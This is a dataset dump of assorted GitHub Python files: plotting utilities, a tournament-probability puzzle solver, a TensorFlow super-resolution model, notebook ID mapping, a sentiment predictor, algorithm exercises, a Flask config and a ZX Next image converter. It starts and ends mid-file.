= (w, h) # width x height\n plots(images, titles=titles, cmap=cmaps, rows=rows, cols=cols,\n figsize=figsize, fig=fig)\n\n\ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n\n\ndef get_fnames(d, random=False):\n fnames = [d + f for f in listdir(d) if osp.isfile(osp.join(d, f))]\n print(\"Number of files found in %s: %s\" % (d, len(fnames)))\n if random:\n shuffle(fnames)\n return fnames\n\n\ndef rm_dir_and_ext(filepath):\n return filepath.split('/')[-1].split('.')[-2]\n\n\ndef get_flickr_id(portrait_fname):\n \"\"\"\n Input (string): '../data/portraits/flickr/cropped/portraits/00074.jpg'\n Output (int): 74\n \"\"\"\n return int(rm_dir_and_ext(portrait_fname))\n\n\ndef get_lines(fname):\n '''Read lines, strip, and split.'''\n with open(fname) as f:\n content = f.readlines()\n content = [x.strip().split() for x in content]\n return content\n\n\ndef hist(data, figsize=(6, 3)):\n plt.figure(figsize=figsize)\n plt.hist(data)\n plt.show()\n\n\ndef plot_portraits_and_masks(portraits, masks):\n assert len(portraits) == len(masks)\n fig, axes = plt.subplots(2, 4, figsize=(12, 6))\n fig.tight_layout()\n for i, ax in enumerate(axes.flat):\n if i < 4:\n ax.imshow(portraits[i], interpolation=\"spline16\")\n else:\n mask = gray2rgb(masks[i-4])\n ax.imshow(mask)\n ax.set_xticks([])\n ax.set_yticks([])\n plt.show()\n\n\ndef gray2rgb(gray):\n w, h = gray.shape\n rgb = np.empty((w, h, 3), dtype=np.uint8)\n rgb[:, :, 2] = rgb[:, :, 1] = rgb[:, :, 0] = gray\n return rgb\n\n\ndef plots(imgs, figsize=(12, 12), rows=None, cols=None,\n interp=None, titles=None, cmap='gray',\n fig=None):\n if not isinstance(imgs, list):\n imgs = [imgs]\n imgs = [np.array(img) for img in imgs]\n if not isinstance(cmap, list):\n if imgs[0].ndim == 2:\n cmap = 'gray'\n cmap = [cmap] * len(imgs)\n if not isinstance(interp, list):\n interp = [interp] * len(imgs)\n n = len(imgs)\n if not rows and not cols:\n cols = n\n rows = 1\n elif not rows:\n rows = cols\n elif not cols:\n cols = rows\n if not fig:\n rows = int(np.ceil(len(imgs) / cols))\n w = 12\n h = rows * (w / cols + 1)\n figsize = (w, h)\n fig = plt.figure(figsize=figsize)\n fontsize = 13 if cols == 5 else 16\n fig.set_figheight(figsize[1], forward=True)\n fig.clear()\n for i in range(len(imgs)):\n sp = fig.add_subplot(rows, cols, i+1)\n if titles:\n sp.set_title(titles[i], fontsize=fontsize)\n plt.imshow(imgs[i], interpolation=interp[i], cmap=cmap[i])\n plt.axis('off')\n plt.subplots_adjust(0, 0, 1, 1, .1, 0)\n # plt.tight_layout()\n if fig:\n fig.canvas.draw()\n","repo_name":"MattKleinsmith/portraitseg","sub_path":"portraitseg/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11949,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"78"} +{"seq_id":"7949210290","text":"import numpy as np\nimport itertools\nimport matplotlib.pyplot as plt\n\ndef win(p1, p2, players):\n # Returns the probaility that p1 wins against p2\n return players[p2] / (players[p1] + players[p2])\n\nclass TournamentTree:\n def __init__(self, players, win_prob):\n self.players = [float(p) for p in players]\n self.win_prob = win_prob\n\n self.init_players = players\n\n def fill_win_prob(self):\n\n # Fill the first column of win proabilities\n for i in range(0, len(self.players), 2):\n a, b = self.players[i], self.players[i+1]\n\n self.win_prob[i][0] = b/(a+b)\n self.win_prob[i+1][0] = a/(a+b)\n\n # Fill the first column of win proabilities\n for i in range(0, len(self.players), 4):\n a, b, c, d = self.players[i], self.players[i+1], \\\n self.players[i+2], self.players[i+3]\n\n self.win_prob[i][1] = self.win_prob[i][0] * (c*d)/(c+d) * (1/(a+c) + 1/(a+d))\n self.win_prob[i+1][1] = self.win_prob[i+1][0] * (c*d)/(c+d) * (1/(b+c) + 1/(b+d))\n self.win_prob[i+2][1] = self.win_prob[i+2][0] * (a*b)/(a+b) * (1/(c+a) + 1/(c+b))\n self.win_prob[i+3][1] = self.win_prob[i+3][0] * (a*b)/(a+b) * (1/(d+a) + 1/(d+b))\n\n # Fill the second column of win proabilities\n for i in range(0, len(self.players), 8):\n\n for j in range(4):\n self.win_prob[i+j][2] = self.win_prob[i+j][1] * ( \\\n self.win_prob[i+4][1] * win(i+j, i+4, self.players) + \\\n self.win_prob[i+5][1] * win(i+j, i+5, self.players) + \\\n self.win_prob[i+6][1] * win(i+j, i+6, self.players) + \\\n self.win_prob[i+7][1] * win(i+j, i+7, self.players) \\\n )\n for j in range(4, 8):\n self.win_prob[i+j][2] = self.win_prob[i+j][1] * ( \\\n self.win_prob[i][1] * win(i+j, i, self.players) + \\\n self.win_prob[i+1][1] * win(i+j, i+1, self.players) + \\\n self.win_prob[i+2][1] * win(i+j, i+2, self.players) + \\\n self.win_prob[i+3][1] * win(i+j, i+3, self.players) \\\n )\n\n def get_win_prob(self, player):\n pos = self.players.index(player)\n\n s = 0\n if pos < 8:\n for i in range(8, 16):\n s += self.win_prob[i][2] * win(pos, i, self.players)\n\n else:\n for i in range(8):\n s += self.win_prob[i][2] * win(pos, i, self.players)\n\n return self.win_prob[pos][2] * s\n\nwin_prob = np.zeros(shape=(16,3))\n\nplayers = [1, 16, 8, 9, 5, 12, 4, 13, 6, 11, 3, 14, 7, 10, 2, 15]\n\ntournament = TournamentTree(players, win_prob)\ntournament.fill_win_prob()\n\n# print(tournament.win_prob)\n# print(np.sum(tournament.win_prob, axis=0))\n\nbase_win = tournament.get_win_prob(2)\nprint('\\nBase winning probability:', base_win)\n\nswaps = []\nfor i, j in itertools.combinations(range(16), 2):\n swap = players.copy()\n swap[i], swap[j] = swap[j], swap[i]\n swaps.append([swap, i, j])\n\nbest_win = base_win\nbest_swap = players\n\n\nswaps_win_prob = []\n\n\nfor s in swaps:\n tournament = TournamentTree(s[0], np.zeros(shape=(16,3)))\n tournament.fill_win_prob()\n cur_win = tournament.get_win_prob(2)\n\n if cur_win > best_win:\n best_win = cur_win\n best_swap = s\n swaps_win_prob.append((str(players[s[1]]) + ' and ' + str(players[s[2]]), cur_win))\n\nprint('We should swap ' + str(players[best_swap[1]]) + ' and ' + str(players[best_swap[2]]))\nprint('Best winning probability for 2-seed:', best_win)\nprint('This leads to an increase in winning chances by', best_win - base_win)\n\nplt.plot([i[0] for i in swaps_win_prob], [i[1] for i in swaps_win_prob])\nplt.xticks(rotation=90, fontsize=6)\nplt.axhline(y=base_win, color='r', linestyle='-')\nplt.show()\n","repo_name":"eric-ycw/jane-street-puzzles","sub_path":"04-2021.py","file_name":"04-2021.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18280975738","text":"\nimport tensorflow as tf\n\n\nclass Srresnet:\n \"\"\"Srresnet Model\"\"\"\n\n def __init__(self, training, content_loss='mse', learning_rate=1e-4, num_blocks=16, num_upsamples=2):\n self.learning_rate = learning_rate\n self.num_blocks = num_blocks\n self.num_upsamples = num_upsamples\n self.training = training\n\n if content_loss not in ['mse', 'L1','edge_loss_mse','edge_loss_L1']:\n print('Invalid content loss function. Must be \\'mse\\', or \\'L1_loss\\'.')\n exit()\n self.content_loss = content_loss\n\n\n def _Prelu(self, _x):\n alphas = tf.get_variable('alpha', _x.get_shape()[-1],\\\n initializer=tf.constant_initializer(0.0),\n dtype=tf.float32)\n pos = tf.nn.relu(_x)\n neg = alphas * (_x - abs(_x)) * 0.5\n\n return pos + neg\n\n def ResidualBlock(self, x, kernel_size, filter_size):\n \"\"\"Residual block a la ResNet\"\"\"\n # with tf.variable_scope('sr_edge_net') as scope:\t\t\n weights = {\n 'w1':tf.get_variable(name='w1_redidual',\\\n shape=[kernel_size, kernel_size, filter_size, filter_size], dtype=tf.float32,\\\n initializer=tf.glorot_normal_initializer()),\n 'w2':tf.get_variable(name='w2_residual',\\\n shape=[kernel_size, kernel_size, filter_size, filter_size], dtype=tf.float32,\\\n initializer=tf.glorot_normal_initializer()),\n }\n\n skip = x\n x = tf.nn.conv2d(x, weights['w1'], strides=[1,1,1,1], padding='SAME')\n x = tf.layers.batch_normalization(x, training=self.training)\n x = tf.contrib.keras.layers.PReLU(shared_axes=[1, 2])(x)\n x = tf.nn.conv2d(x, weights['w2'], strides=[1,1,1,1], padding='SAME')\n x = tf.contrib.keras.layers.PReLU(shared_axes=[1, 2])(x)\n x = tf.layers.batch_normalization(x, training=self.training)\n\n x = x + skip\n return x\n\n def Upsample2xBlock(self, x, kernel_size, filter_size):\n weights = {\n 'w1':tf.get_variable(name='w1_upsample',\\\n shape=[kernel_size, kernel_size, 64, filter_size], dtype=tf.float32,\\\n initializer=tf.glorot_normal_initializer()),\n }\n \"\"\"Upsample 2x via SubpixelConv\"\"\"\n print('init',x)\n x = tf.nn.conv2d(x, weights['w1'], strides=[1,1,1,1], padding='SAME')\n print('before',x)\n x = tf.depth_to_space(x, 2)\n print('after',x)\n\n x = tf.contrib.keras.layers.PReLU(shared_axes=[1, 2])(x)\n return x\n\n\n def forward(self, x):\n with tf.variable_scope('srresnet_edge',reuse=tf.AUTO_REUSE) as scope:\n\n weights = {\n 'w_in':tf.get_variable(name='w_in', shape=[9, 9, 3, 64], dtype=tf.float32,\\\n initializer=tf.glorot_normal_initializer()),\n 'w1':tf.get_variable(name='w1', shape=[3, 3, 64, 64], dtype=tf.float32,\\\n initializer=tf.glorot_normal_initializer()),\n 'w_out':tf.get_variable(name='w_out', shape=[9, 9, 64, 3], dtype=tf.float32,\\\n initializer=tf.glorot_normal_initializer()),\n }\n\n # print(x_concate)\n x = tf.nn.conv2d(x, weights['w_in'], strides=[1,1,1,1], padding='SAME')\n x = tf.contrib.keras.layers.PReLU(shared_axes=[1, 2])(x)\n skip = x\n\n for i in range(self.num_blocks):\n x = self.ResidualBlock(x, 3, 64)\n\n x = tf.nn.conv2d(x, weights['w1'], strides=[1,1,1,1], padding='SAME', name='layer_1')\n x = tf.layers.batch_normalization(x, training=self.training)\n x = x + skip\n\n for i in range(self.num_upsamples):\n x = self.Upsample2xBlock(x, kernel_size=3, filter_size=256)\n\n x = tf.nn.conv2d(x, weights['w_out'], strides=[1,1,1,1], padding='SAME', name='y_predict')\n\n print(x)\n return x\n\n def _content_loss(self, y, y_pred):\n \"\"\"MSE, VGG22, or VGG54\"\"\"\n if self.content_loss == 'mse':\n return tf.reduce_mean(tf.square(y - y_pred))\n\n if self.content_loss == 'L1':\n return tf.reduce_mean(tf.abs(y - y_pred))\n\n if self.content_loss == 'edge_loss_mse':\n lamd = 0.5\n y_sobeled = tf.image.sobel_edges(y)\n y_pred_sobeled = tf.image.sobel_edges(y_pred)\n return tf.reduce_mean(tf.square(y - y_pred)) + (lamd*tf.reduce_mean(tf.square(y_sobeled - y_pred_sobeled)))\n\n if self.content_loss == 'edge_loss_L1':\n lamd = 0.5\n y_sobeled = tf.image.sobel_edges(y)\n y_pred_sobeled = tf.image.sobel_edges(y_pred)\n return tf.reduce_mean(tf.abs(y - y_pred)) + (lamd*tf.reduce_mean(tf.square(y_sobeled - y_pred_sobeled)))\n\n def loss_function(self, y, y_pred):\n\n # Content loss only\n return self._content_loss(y, y_pred)\n\n def optimize(self, loss):\n # tf.control_dependencies([discrim_train\n # update_ops needs to be here for batch normalization to work\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS, scope='srresnet_edge')\n with tf.control_dependencies(update_ops):\n return tf.train.AdamOptimizer(self.learning_rate).minimize(loss, var_list=tf.get_collection(\n tf.GraphKeys.TRAINABLE_VARIABLES, scope='srresnet_edge'))","repo_name":"benblackcake/srresnet-edge-enhance","sub_path":"srresnet.py","file_name":"srresnet.py","file_ext":"py","file_size_in_byte":5338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37541773862","text":"import json\nimport pandas as pd\nimport argparse \n\n\ndef _open_logs(_path):\n '''\n Quick function to open logs and return a Pandas DataFrame of the job names\n and job ids from the export log.\n\n Parameters: _path STRING the path to be opened\n\n Returns: Pandas DataFrame\n '''\n important_logs = []\n log_dict = {}\n\n with open(_path) as filename:\n f = filename.readlines()\n print(\"READING LOGS ======\")\n\n for i, line in enumerate(f):\n important_logs.append(json.loads(line))\n log_dict.update({important_logs[i]['path']: int(important_logs[i]['object_id'])})\n #print(important_logs[i]['path'], important_logs[i]['object_id'])\n\n return pd.DataFrame(data=list(log_dict.items()), columns=['path', 'object_id'])\n\ndef main(NEW_PATH, OLD_PATH, OLD_URL, NEW_URL, E2_WORKSPACE_ID):\n # Open the old WS logs\n oldPath = OLD_PATH\n newPath = NEW_PATH\n\n old_log_df = _open_logs(oldPath)\n old_log_df['path'] = old_log_df['path'].astype(str)\n print(old_log_df.head())\n\n\n new_log_df = _open_logs(newPath)\n new_log_df['path'] = new_log_df['path'].astype(str)\n print(new_log_df.head())\n new_log_df['path_replaced_archive_with_users'] = new_log_df['path'].str.replace(\"Archive\", \"Users\")\n join_df = pd.merge(old_log_df, new_log_df, \"left\", left_on=\"path\", right_on = \"path_replaced_archive_with_users\", suffixes=(\"_old\", \"_new\"))\n\n #print(join_df.head())\n\n join_df = join_df[['path_old', 'object_id_old', 'object_id_new']]\n join_df['notebook_url_old'] = f\"https://{str(OLD_URL)}/#notebook/\" + join_df['object_id_old'].astype(str)\n join_df['notebook_url_new'] = f\"https://{str(NEW_URL)}/?o={str(E2_WORKSPACE_ID)}#notebook/\" + join_df['object_id_new'].astype(str)\n\n #print(f\"Found {len(old_log_df)} notebooks in ST workspace and {len(new_log_df)} notebooks in E2 workspace.\")\n #print(\"Saving the csv file of all notebook mappings...\")\n join_df.to_csv(\"./all_notebook_mapping.csv\")\n\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser(description=\"Map notebooks between workspaces.\")\n parser.add_argument(\"--newPath\", \"--NEW\", dest=\"NEW_PATH\", help=\"Path to the new user_workspace.log file.\")\n parser.add_argument(\"--oldPath\", \"--OLD\", dest=\"OLD_PATH\", help=\"Path to the old user_workspace.log file.\")\n\n parser.add_argument(\"--oldURL\", dest=\"OLD_URL\", help=\"Workspace URL of ST workspace.\")\n parser.add_argument(\"--newURL\", dest=\"NEW_URL\", help=\"Workspace URL of E2 workspace.\")\n parser.add_argument(\"--workspace-id\", dest=\"E2_WORKSPACE_ID\", help=\"Workspace ID of E2 workspace.\")\n\n parser = parser.parse_args()\n main(parser.NEW_PATH, parser.OLD_PATH, parser.OLD_URL, parser.NEW_URL, parser.E2_WORKSPACE_ID)","repo_name":"Lovelytics/public-migration-scripts","sub_path":"notebook_script/notebook_ids_mapping.py","file_name":"notebook_ids_mapping.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32547127179","text":"import numpy as np\nimport gensim as gs\nfrom sys import argv\nfrom keras.models import load_model\nimport pandas as pd\nimport re\nfrom keras.preprocessing.sequence import pad_sequences\nimport time\n\nseq_length=40\nencode_dim=100\n\nt1=time.time()\nwith open (argv[1], \"r\") as myfile:\n x_test_temp=myfile.read().splitlines()[1:]\n\nfor x in range(len(x_test_temp)):\n\tptr=0\n\twhile x_test_temp[x][ptr]!=',': ptr+=1\n\tx_test_temp[x]=x_test_temp[x][ptr+1:]\n\ndef elimiate_tripple(s):\n\tif len(s)==0: return \"\"\n\tto_rem=[]\n\tfor x in range(len(s)-1):\n\t\tif s[x]==s[x+1]:\n\t\t\tto_rem.append(x+1)\n\tre=s[0]\n\tfor x in range(1,len(s)):\n\t\tif x not in to_rem:\n\t\t\tre+=s[x]\n\treturn re\n\nfor x in range(len(x_test_temp)):\n\tx_test_temp[x]=re.sub('[^a-zA-z0-9\\s!?.]','',x_test_temp[x]).lower()\n\tx_test_temp[x]=elimiate_tripple(x_test_temp[x])\n\nx_test=[]\nfor line in x_test_temp:\n\tsentence=[]\n\tfor word in line.split():\n\t\tsentence.append(word)\n\tx_test.append(sentence)\nx_test=np.array(x_test)\n\nw2v_model=gs.models.Word2Vec.load('w2v_100_model')\nX=np.zeros((x_test.shape[0],seq_length,encode_dim))\nfor i in range(x_test.shape[0]):\n\tfor j in range(len(x_test[i])):\n\t\tif j>(seq_length-1): break\n\t\tif x_test[i][j] in w2v_model.wv.vocab:\n\t\t\tX[i,j,:]=w2v_model.wv[x_test[i][j]]\n\nprint(time.time()-t1,'seconds used.')\n\nmodel=load_model('1526651381.1485553_5.h5')\nprediction=model.predict(X)\n\nprint('predicting...')\no=open(argv[2],'w')\no.write(\"id,label\\n\")\nfor i in range(prediction.shape[0]):\n if prediction[i][0]<0.5:\n o.write(\"{},{}\\n\".format(i,0))\n else:\n o.write(\"{},{}\\n\".format(i,1))\no.close()\nprint(time.time()-t1,'seconds used.')\n","repo_name":"Andy19961017/ML2018SPRING","sub_path":"hw5/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4099443690","text":"#!/usr/bin/python -t\n\n# dp solution, time O(n^2) space O(n)\n\nclass Solution:\n \"\"\"\n @param A: A list of integers\n @return: A boolean\n \"\"\"\n def canJump(self, A):\n # write your code here\n # state: dp[i], wether we can reach point i\n # function: dp[i] = true if dp[j] == true and A[j] >= i-j, 0<=j= i-j:\n dp[i] = True\n break\n \n return dp[n-1]\n\n\n#greedy O(n)\n\nclass Solution:\n \"\"\"\n @param A: A list of integers\n @return: A boolean\n \"\"\"\n def canJump(self, A):\n # write your code here\n n = len(A)\n if n == 0:\n return False\n \n far = A[0]\n \n for i in range(n):\n if i <= far and i+A[i] > far:\n far = i+A[i]\n \n return far >= n-1\n\n#dp O(n2)\n\nclass Solution:\n \"\"\"\n @param A: A list of integers\n @return: A boolean\n \"\"\"\n def canJump(self, A):\n # write your code here\n n = len(A)\n canjump = [False] * n\n canjump[0] = True\n \n for i in range(1, n):\n for j in range(0, i):\n if canjump[j] and j + A[j] >= i:\n canjump[i] = True\n break\n \n return canjump[n-1]\n\n#DP my own solution beat 100%\n#time O(n2), space O(n)\n\nclass Solution:\n \"\"\"\n @param A: A list of integers\n @return: A boolean\n \"\"\"\n def canJump(self, A):\n # write your code here\n n = len(A)\n if n == 0:\n return False\n \n if n == 1:\n return True\n dp = [0] * n\n \n dp[0] = A[0]\n \n for i in range(n-1):\n if dp[i] != 0:\n for j in range(A[i]):\n if i+j > n-1:\n return True\n dp[i+j] = 1 \n else:\n return False\n \n return True\n\n","repo_name":"boknowswiki/mytraning","sub_path":"lintcode/python/0116_jump_game.py","file_name":"0116_jump_game.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"24705222982","text":"n = int(input())\ntemp = n\nn = list(str(n))\nfor i in range(len(n)):\n n[i]=int(n[i])\nc = 0\nfor i in range(len(n)):\n fact = 1\n for j in range(1,n[i]+1):\n fact = fact*j\n n[i]=fact\nif sum(n)==temp:\n print('The number',temp,'is a strong number')\nelse:\n print('The number',temp,'is not a strong number')","repo_name":"Hemanth1502/codemind-python","sub_path":"Strong_Number.py","file_name":"Strong_Number.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8091384790","text":"import sol1\n\nmoves = [ [ 1, 1],\n [ 3, 1],\n [ 5, 1],\n [ 7, 1],\n [ 1, 2]]\n\ntot = 1\nfor moveset in moves:\n horMove = moveset[0]\n verMove = moveset[1]\n rtrees = sol1.sol1func(\"input.txt\",horMove,verMove)\n print(\"Trees for \" + str(horMove) + \" \" + str(verMove) + \": \" + str(rtrees))\n tot *= rtrees\n\nprint(\"Tot: \" + str(tot))","repo_name":"domenicostefani/AdventOfCode2020","sub_path":"day3/sol2.py","file_name":"sol2.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17725622615","text":"#!/usr/bin/env python3\nimport getopt\nimport sys\n\nfrom PIL import Image\n\nimport zxntools as zxn\n\nBITS = 8\nLABEL = \"label\"\nOFFSET = 0\nSKIP = 1\nSIZE = 16\nRAW = 0\nASM = 1\nPGM = 2\nVERSION = \"1.00.00\"\nDATE = \"20210324\"\n\n\ndef my_help(name):\n version()\n sys.stderr.write(\n \"\"\"Usage: {} [] [] []\n\\toptions are\n\\t-a\\t--asm\\t\\toutput assembly code (asm)\n\\t-b\\t--bits\\t\\tset bit depth of palette ({})\n\\t-h\\t--help\\t\\tshow this help message\n\\t-i\\t--in\\t\\tinput file (stdin)\n\\t-l\\t--label\\t\\tlabel in assembly file({})\n\\t-o\\t--out\\t\\toutput file (stdout)\n\\t-O\\t--offset\\toffset (x and y) in image ({})\n\\t-p\\t--pal\\t\\tpalette file (internal)\n\\t-r\\t--raw\\t\\toutput raw binary data (asm)\n\\t-s\\t--sprite\\tgenerate sprites = -b8 -z16\n\\t-S\\t--skip\\t\\tuse every nth pixel ({})\n\\t-V\\t--version\\tget version information\n\\t-v\\t--verbose\\tincrease verbosity\n\\t-z\\t--size\\t\\telement size ({})\n\"\"\".format(name, BITS, LABEL, OFFSET, SKIP, SIZE))\n\n\ndef version():\n sys.stderr.write(\"imagetoasm version {} {}\\n\".format(VERSION, DATE))\n zxn.version(True)\n\n\ndef decimate(img, offx, offy, skipx, skipy):\n inx, iny = img.size\n outx = (inx - offx + skipx - 1) // skipx\n outy = (iny - offy + skipy - 1) // skipy\n rv = Image.new('RGB', (outx, outy))\n\n y2 = offy\n for y1 in range(outy):\n x2 = offx\n for x1 in range(outx):\n rv.putpixel((x1, y1), img.getpixel((x2, y2)))\n x2 += skipx\n y2 += skipy\n\n return rv\n\n\ndef writeraw(fd, img, bits, txsz, tysz):\n ixsz, iysz = img.size\n tx = ixsz // txsz\n ty = iysz // tysz\n mask = (1 << bits) - 1\n buf = []\n for tr in range(ty):\n rbase = tr * tysz\n for tc in range(tx):\n cbase = tc * txsz\n for r in range(tysz):\n for c in range(0, txsz, 8 // bits):\n v = 0\n for b in range(8 // bits):\n v = (v << bits) | img.getpixel((c + cbase + b, r + rbase)) & mask\n buf.append(v)\n\n fd.write(bytes(buf))\n\n\ndef writepgm(fd, img, bits, txsz, tysz):\n ixsz, iysz = img.size\n tx = ixsz // txsz\n ty = iysz // tysz\n mask = (1 << bits) - 1\n fd.write(bytes(\"P5\\n{} {}\\n{}\\n\".format(txsz, ixsz * tx, mask), 'ascii'))\n buf = []\n for tr in range(ty):\n rbase = tr * tysz\n for tc in range(tx):\n cbase = tc * txsz\n for r in range(tysz):\n for c in range(0, txsz, 8 // bits):\n for b in range(8 // bits):\n buf.append(img.getpixel((c + cbase + b, r + rbase)) & mask)\n\n fd.write(bytes(buf))\n\n\ndef writeasm(fd, img, bits, label, txsz, tysz):\n ixsz, iysz = img.size\n tx = ixsz // txsz\n ty = iysz // tysz\n mask = (1 << bits) - 1\n\n fd.write(\"{}\\n\".format(label))\n cnt = 0\n col = 0\n\n for tr in range(ty):\n rbase = tr * tysz\n\n for tc in range(tx):\n cbase = tc * txsz\n if col != 0:\n fd.write(\"\\n\")\n col = 0\n fd.write(\";; {} {:02x}\\n\".format(label, cnt))\n cnt += 1\n for r in range(tysz):\n for c in range(0, txsz, 8 // bits):\n v = 0\n for b in range(8 // bits):\n v = (v << bits) | img.getpixel((c + cbase + b, r + rbase)) & mask\n if col == 0:\n fd.write(\"\\tdefb {:02x}\".format(v))\n elif col != 15:\n fd.write(\", {:02x}\".format(v))\n else:\n fd.write(\", {:02x}\\n\".format(v))\n col = (col + 1) % 16\n\n if col != 0:\n fd.write(\"\\n\")\n fd.write(\"{}_end:\\n\".format(label))\n\n\nverbose = 0\noffset = OFFSET\nskip = SKIP\nsize = SIZE\nbits = BITS\nouttype = ASM\nlabel = LABEL\ninname = None\noutname = None\npalname = None\npalfile = None\n\nopts = \"ab:ghi:l:o:O:p:rsS:tvVz:\"\nlongopts = ['asm', 'bits=', 'pgm', 'help', 'in=', 'label=', 'out=', 'offset=',\n 'pal=', 'raw', 'sprite', 'skip=', 'tile' 'version' 'verbose', 'size=']\n\ntry:\n optlist, arglist = getopt.getopt(sys.argv[1:], opts, longopts)\nexcept getopt.GetoptError as err:\n sys.stderr.write(\"{}\\n\".format(err))\n exit(1)\n\nfor opt, arg in optlist:\n if opt in ('-b', '--bits'):\n bits = int(arg)\n if bits != 1 and bits != 2 and bits != 4 and bits != 8:\n sys.stderr.write(\"Unsupported bit depth: {}\\n\".format(bits))\n exit(1)\n\n elif opt in ('-g', '--pgm'):\n outtype = PGM\n\n elif opt in ('-h', '--help'):\n my_help(sys.argv[0])\n exit(0)\n\n elif opt in ('-i', '--in'):\n inname = arg\n\n elif opt in ('-l', '--label'):\n label = arg\n\n elif opt in ('-O', '--offset'):\n offset = int(arg)\n\n elif opt in ('-o', '--out'):\n outname = arg\n\n elif opt in ('-p', '--pal'):\n palname = arg\n\n elif opt in ('-r', '--raw'):\n outtype = RAW\n\n elif opt in ('-s', '--sprite'):\n bits = 8\n size = 16\n\n elif opt in ('-S', '--skip'):\n skip = int(arg)\n\n elif opt in ('-t', '--tile'):\n bits = 4\n size = 8\n\n elif opt in ('-V', '--version'):\n version()\n exit(0)\n\n elif opt in ('-v', '--verbose'):\n verbose += 1\n\n elif opt in ('-z', '--size'):\n size = int(arg)\n\n else:\n sys.stderr.write(\"Illegal option {}\\n\", opt)\n exit(1)\n\nif palname is not None:\n try:\n palfile = open(palname, 'rb')\n except OSError:\n sys.stderr.write(\"Unable to open {}\\n\".format(inname))\n exit(1)\n\nif len(arglist) > 0 and inname is None:\n inname = arglist.pop(0)\n\nif len(arglist) > 0 and outname is None:\n outname = arglist.pop(0)\n\nif inname is None:\n sys.stderr.write(\"No input file\\n\")\n\nif outname is None:\n sys.stderr.write(\"No output file\\n\")\n\ntry:\n infile = open(inname, 'rb')\nexcept OSError:\n sys.stderr.write(\"Unable to open {}\\n\".format(inname))\n exit(1)\n\ntry:\n if outtype == RAW or outtype == PGM:\n outfile = open(outname, 'wb')\n else:\n outfile = open(outname, 'w')\nexcept OSError:\n sys.stderr.write(\"Unable to open {}\\n\".format(outname))\n exit(1)\n\nzxn.setverbose(verbose)\nimage = Image.open(infile)\nimage.convert('RGB')\n# rgb = image.data()\n\nif palfile is not None:\n pal = zxn.readpal(palfile)\nelse:\n pal = zxn.makepal(zxn.palette(bits))\n\ndec = decimate(image, offset, offset, skip, skip)\ndec = dec.quantize(colors=(1 << bits), palette=pal, dither=Image.NONE)\n\nxsz, ysz = dec.size\nif xsz % size != 0 or ysz % size != 0:\n sys.stderr.write(\"Not perfectly tilable\\n\")\n exit(-1)\n\nif outtype == RAW:\n writeraw(outfile, dec, bits, size, size)\nelif outtype == ASM:\n writeasm(outfile, dec, bits, label, size, size)\nelif outtype == PGM:\n writepgm(outfile, dec, bits, size, size)\nelse:\n sys.stderr.write(\"Output type error\\n\")\n\ninfile.close()\noutfile.close()\n","repo_name":"varmfskii/zxnimage","sub_path":"python/imagetoasm.py","file_name":"imagetoasm.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42314414828","text":"# form stuff\nCSRF_ENABLED = True\nSECRET_KEY = 'you-will-never-guess'\n\n# database stuff\nimport os\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\nSQLALCHEMY_DATABASE_URI = 'mysql://root:pawler@localhost/pawlerdb?unix_socket=/var/run/mysqld/mysqld.sock'\nSQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')\n","repo_name":"aaustin/pawler","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"33162825013","text":"# !/usr/bin/python\r\n# coding=utf-8\r\n'''\r\n['\\ufeff_id', 'url_token', 'allow_message', 'answer_count', 'articles_count',\r\n 'avatar_url', 'avatar_url_template', 'badge', 'business', 'columns_count',\r\n 'educations', 'companies', 'favorite_count', 'favorited_count', 'follower_count',\r\n 'following_columns_count', 'following_count', 'following_favlists_count', 'following_question_count', 'following_topic_count',\r\n 'gender', 'headline', 'hosted_live_count', 'id', 'is_advertiser',\r\n 'is_blocking', 'is_followed', 'is_following', 'is_org', 'locations',\r\n 'name', 'participated_live_count', 'pins_count', 'question_count', 'thank_from_count',\r\n 'thank_to_count', 'thanked_count', 'type', 'url', 'user_type',\r\n 'vote_from_count', 'vote_to_count', 'voteup_count']\r\n'''\r\nimport csv\r\nfrom matplotlib import pyplot as plt\r\nimport json\r\nfrom collections import Counter\r\nimport matplotlib.pyplot as plt\r\nfrom wordcloud import WordCloud\r\nfrom wordcloud import WordCloud,STOPWORDS,ImageColorGenerator\r\nfrom scipy.misc import imread\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport jieba\r\n\r\n#指定默认字体\r\nplt.rcParams['font.sans-serif'] = ['SimHei']\r\nplt.rcParams['font.family']='sans-serif'\r\n#解决负号'-'显示为方块的问题\r\nplt.rcParams['axes.unicode_minus'] = False\r\n\r\n\r\n# 定义列表存储数据\r\ngender = []\r\nlocations = []\r\nname = []\r\nfollower_count = []\r\nfollowing_count = []\r\nvoteup_count = []\r\nthanked_count = []\r\nanswer_count = []\r\nquestion_count = []\r\narticles_count = []\r\neducations = []\r\ncompanies = []\r\njobs = []\r\nbusiness = 